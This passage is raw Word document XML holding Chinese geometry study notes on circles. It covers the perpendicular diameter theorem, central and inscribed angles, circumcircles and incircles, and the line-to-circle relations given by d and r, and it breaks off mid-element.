        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>圆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、垂径定理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）圆是轴对称图形，任何一条直径所在直线都是它的对称轴。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）垂直于弦的直径平分弦，并且平分弦所对的两条弧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）平分弦（不是直径）的直径垂直于弦，并且平分弦所对的两条弧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、圆心角定理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）圆是中心对称图形，圆心就是它的对称中心。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）在同圆或等圆中，相等的圆心角所对的弧相等，所对的弦也相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）在同圆或等圆中，如果两个圆心角、两条弧、两条弦中有一组量相等，那么它们所对应的其余各组量都分别相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、圆周角定理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）在同圆或等圆中，同弧或等弧所对的圆周角相等，都等于这条弧所对的圆心角的一半。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）在同圆或等圆中，如果两个圆周角相等，它们所对的弧一定相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）半圆或直径所对的圆周角是直角；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>°</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的圆周角所对的弦是直径。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）圆内接四边形的对角互补。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）如果三角形一条边上的中线等于这条边的一半，那么这个三角形是直角三角形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、三角形与圆：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）不在同一条直线上的三个点确定一个圆。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>过三角形的三个顶点的圆叫做三角形的外接圆，其圆心叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>做三角形的外心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>外心是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三角形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中垂线的交点，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>到三角形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个顶点的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>距离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>与三角形三边</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都</w:t>
      </w:r>
      <w:r>
        <w:t>相切</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的圆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>叫做三角形的</w:t>
      </w:r>
      <w:r>
        <w:t>内切圆，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其圆心叫做三角形的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内心，内心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三角形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个内角平分线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的交点，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三角形</w:t>
      </w:r>
      <w:r>
        <w:t>三条边</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>距离相等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>28.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点与圆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直线与圆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>直线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>⊙</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">r  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>直线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>⊙</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相切</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> d=r  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>直线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>⊙</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">r  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>圆与圆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>两圆外离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
